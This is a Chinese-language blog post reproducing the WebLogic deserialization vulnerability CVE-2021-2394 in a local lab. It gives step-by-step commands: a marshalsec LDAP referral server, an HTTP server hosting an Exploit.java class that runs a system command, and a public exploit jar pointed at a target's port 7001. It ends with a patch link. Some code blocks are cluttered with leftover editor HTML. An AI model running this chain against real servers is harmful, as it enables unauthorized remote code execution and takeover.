CVE-2021-2394：Weblogic反序列化漏洞复现

Delina

原文链接：CVE-2021-2394：Weblogic反序列化漏洞复现
​
0x01 简介

WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
0x02 漏洞概述

编号：CVE-2021-2394
Oracle官方发布了2021年7月份安全更新通告，通告中披露了WebLogic组件存在高危漏洞，攻击者可以在未授权的情况下通过IIOP、T3协议对存在漏洞的WebLogic Server组件进行攻击。成功利用该漏洞的攻击者可以接管WebLogic Server。

这是一个二次反序列化漏洞，是CVE-2020-14756和CVE-2020-14825的调用链相结合组成一条新的调用链来绕过weblogic黑名单列表。
0x03 影响版本

Oracle WebLogic Server 10.3.6.0.0
Oracle WebLogic Server 12.1.3.0.0
Oracle WebLogic Server 12.2.1.3.0
Oracle WebLogic Server 12.2.1.4.0
Oracle WebLogic Server 14.1.1.0.0
0x04 环境搭建

系统环境：window10系统
weblogic版本：12.2.1.3, 直接官网下载就可以

​

weblogic安装过程省略，很简单
安装好之后，在此目录启动就可以
C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\startWebLogic.cmd
​
weblogic启动成功的截图

​

0x05 漏洞复现

1、下载marshalsec利用marshalsec开启JNDI服务

1. https://github.com/mbechler/marshalsec # 需要自己编译
   
2. mvn clean package –DskipTests
   
3. 
   
4. https://github.com/RandomRobbieBF/marshalsec-jar # 可以直接使用

复制代码

2、创建Exploit.java，通过javac编译得到Exploit.class   

1. public class Exploit {
   
2. 
   
3.     static {
   
4.         System.err.println("Pwned");
   
5.         try {
   
6.             String cmds = "calc";
   
7.             Runtime.getRuntime().exec(cmds);
   
8.         } catch ( Exception e ) {
   
9.             e.printStackTrace();
   
10.         }
    
11.     }
    
12. }

复制代码

3、在同目录下使用python开启一个http服务，并使用marshalsec开启JNDI服务

1. python -m http.server 8000
   
2. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Exploit" 8087

复制代码

​

​

4、利用我们组lz2y大佬写的exp进行复现

1. <div aria-label="代码段 小部件" class="cke_widget_wrapper cke_widget_block cke_widget_codeSnippet cke_widget_selected" data-cke-display-name="代码段" data-cke-filter="off" data-cke-widget-id="164" data-cke-widget-wrapper="1" role="region" tabindex="-1" contenteditable="false"><pre class="cke_widget_element" data-cke-widget-data="%7B%22code%22%3A%22https%3A%2F%2Fgithub.com%2Flz2y%2FCVE-2021-2394%2Freleases%2Ftag%2F2.0%22%2C%22classes%22%3Anull%7D" data-cke-widget-keep-attr="0" data-cke-widget-upcasted="1" data-widget="codeSnippet"><code class="hljs">https://github.com/lz2y/CVE-2021-2394/releases/tag/2.0</code></pre>
   
2. <span class="cke_reset cke_widget_drag_handler_container" style="background:rgba(220,220,220,0.5);background-image:url(https://csdnimg.cn/release/blog_editor_html/release1.8.4/ckeditor/plugins/widget/images/handle.png);display:none;"><img class="cke_reset cke_widget_drag_handler" data-cke-widget-drag-handler="1" role="presentation" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" title="点击并拖拽以移动" width="15" height="15"></span></div>
   
3. 
   
4. 
   
5. 
   
6. 
   
7. 
   
8. <div aria-label="代码段 小部件" class="cke_widget_wrapper cke_widget_block cke_widget_codeSnippet cke_widget_selected" data-cke-display-name="代码段" data-cke-filter="off" data-cke-widget-id="163" data-cke-widget-wrapper="1" role="region" tabindex="-1" contenteditable="false">
   
9. <pre class="cke_widget_element" data-cke-widget-data="%7B%22code%22%3A%22java%20-jar%20CVE_2021_2394.jar%20192.168.31.3%207001%20ldap%3A%2F%2F192.168.3.35%3A8087%2FExploit%22%2C%22classes%22%3Anull%7D" data-cke-widget-keep-attr="0" data-cke-widget-upcasted="1" data-widget="codeSnippet"><code class="hljs">java -jar CVE_2021_2394.jar 192.168.31.3 7001 ldap://192.168.3.35:8087/Exploit</code></pre></div>

复制代码

​

目标机成功弹框

​

0x06 修复方式

当前官方已发布受影响版本的对应补丁，建议受影响的用户及时更新官方的安全补丁。链接如下：
https://www.oracle.com/security-alerts/cpuapr2021.html
​